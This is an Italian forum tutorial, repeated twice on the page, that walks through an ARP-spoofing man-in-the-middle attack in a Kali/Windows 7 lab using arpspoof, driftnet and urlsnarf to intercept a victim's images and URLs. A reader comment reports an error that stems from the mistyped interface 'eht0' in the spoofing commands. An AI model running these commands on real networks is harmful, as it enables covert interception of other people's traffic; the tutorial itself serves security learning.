Guida ARP spoofing: attacco Man in The Middle

22 Febbraio 2022
475
42
353
350
Ultima modifica:
L'ARP spoofing è un attacco MiTM che sfrutta la fiducia del protocollo ARP, essendo che non tiene conto di chi fa l'ARP reply, useremo la suite di Dsniff per fare il tutto, in particolare i tool:
  • arpspoof​
  • urlsnarf​
  • driftnet​
Serviranno due VM, una attacante, Kali Linux, e una vittima, Windows 7 (per configurarle vedere qui).
Dsniff non è installato di default su Kali 2022.2/2022.1, perciò lo installiamolo noi:
Bash:
sudo apt install dsniff -y
Io uso Kali 1.1.0 ed è preinstallato.

1. Prima dell'attacco
Prima si eseguire il tutto, dobbiamo mettere la scheda di rete in promiscuos mode e effettuare un IP forwarding per evitare un DoS alla nostra macchina, per farlo scriviamo nella shell:

Bash:
ifconfig eth0 promisc
sysctl -w net.ipv4.ip_forward=1
Screenshot_2022-06-20_16-01-32.png
Ora andiamo su Windows apriamo il cmd e scriviamo arp -a, l'output:
Codice:
C:\users\root>arp -a

Interfaccia: 192.168.1.86 --- 0xb
 Indirizzo Internet    Indirizzo fisico     tipo
 192.168.1.1           b8-d5-26-7c-43-5d    dinamico
 192.168.1.255         ff-ff-ff-ff-ff-ff    statico
 192.168.1.1           01-00-5e-00-00-16    statico
 192.168.1.255         01-00-5e-00-00-fc    statico
 192.168.1.1           ff-ff-ff-ff-ff-ff    statico
Segniamoci l'IP della macchina e del router,192.168.1.86/192.168.1.1

2. Iniziamo l'attacco
Andiamo nel terminale e scriviamo:
Bash:
arpspoof -i eht0 -t 192.168.1.1 192.168.1.86 #shell 1
arpspoof -i eht0 -t 192.168.1.86 192.168.1.1 #shell 2
aprspoofing.png
In questo modo abbiamo lanciato l'attacco di ARP spoofing. Se non volete usare due shell usate il terminale terminator che ci permette di fare lo split delo schermo, avere due shell su un unico terminale.

2.1 Intercettare immagini e link
Adesso intercetteremo immagini e link grazie ai tool driftnet e urlsnarf, per le immagini la sintassi è la seguente:
Bash:
driftnet -i eth0
Si aprirà una finestra dove verranno visualizzate le immagini dei siti che la vittima sta visitando:

gogole-drift.png

Per urlsnarf la sintassi è la stessa:
Bash:
urlsnarf -i eth0
Inizieranno a scorrere i link HTTP dei siti che la vittima sta guardando:

urlsnarf.png
Dal parametro GET si puo vedere il link, in questo caso è http://old.kali.org.
Una volta finito dobbiamo stoppare l'IP forwarding in questo modo:
Bash:
sysctl -w net.ipv4.ip_forward=0
 
L'ARP spoofing è un attacco MiTM che sfrutta la fiducia del protocollo ARP, essendo che non tiene conto di chi fa l'ARP reply, useremo la suite di Dsniff per fare il tutto, in particolare i tool:
  • arpspoof
  • urlsnarf
  • driftnet
Serviranno due VM, una attacante, Kali Linux, e una vittima, Windows 7 (per configurarle vedere qui).
Dsniff non è installato di default su Kali 2022.2/2022.1, perciò lo installiamolo noi:
Bash:
sudo apt install dsniff -y
Io uso Kali 1.1.0 ed è preinstallato.

1. Prima dell'attacco
Prima si eseguire il tutto, dobbiamo mettere la scheda di rete in promiscuos mode e effettuare un IP forwarding per evitare un DoS alla nostra macchina, per farlo scriviamo nella shell:
Bash:
ifconfig eth0 promisc
sysctl -w net.ipv4.ip_forward=1
Ora andiamo su Windows apriamo il cmd e scriviamo arp -a, l'output:
Codice:
C:\users\root>arp -a

Interfaccia: 192.168.1.86 --- 0xb
 Indirizzo Internet    Indirizzo fisico     tipo
 192.168.1.1           b8-d5-26-7c-43-5d    dinamico
 192.168.1.255         ff-ff-ff-ff-ff-ff    statico
 192.168.1.1           01-00-5e-00-00-16    statico
 192.168.1.255         01-00-5e-00-00-fc    statico
 192.168.1.1           ff-ff-ff-ff-ff-ff    statico
Segniamoci l'IP della macchina e del router,192.168.1.86/192.168.1.1

2. Iniziamo l'attacco
Andiamo nel terminale e scriviamo:
Bash:
arpspoof -i eht0 -t 192.168.1.1 192.168.1.86 #shell 1
arpspoof -i eht0 -t 192.168.1.86 192.168.1.1 #shell 2
In questo modo abbiamo lanciato l'attacco di ARP spoofing. Se non volete usare due shell usate il terminale terminator che ci permette di fare lo split delo schermo, avere due shell su un unico terminale.

2.1 Intercettare immagini e link
Adesso intercetteremo immagini e link grazie ai tool driftnet e urlsnarf, per le immagini la sintassi è la seguente:
Bash:
driftnet -i eth0
Si aprirà una finestra dove verranno visualizzate le immagini dei siti che la vittima sta visitando:
Per urlsnarf la sintassi è la stessa:
Bash:
urlsnarf -i eth0
Inizieranno a scorrere i link HTTP dei siti che la vittima sta guardando:
Dal parametro GET si puo vedere il link, in questo caso è http://old.kali.org.
Una volta finito dobbiamo stoppare l'IP forwarding in questo modo:
Codice:
sysctl -w net.ipv4.ip_forward=0

./ghxst
Dopo l'esecuzione delle due righe di codice del punto 2 mi viene fuori : arpspoof: libnet_check_iface() ioctl: No such device e non riesco a procedere, come potrei risolvere?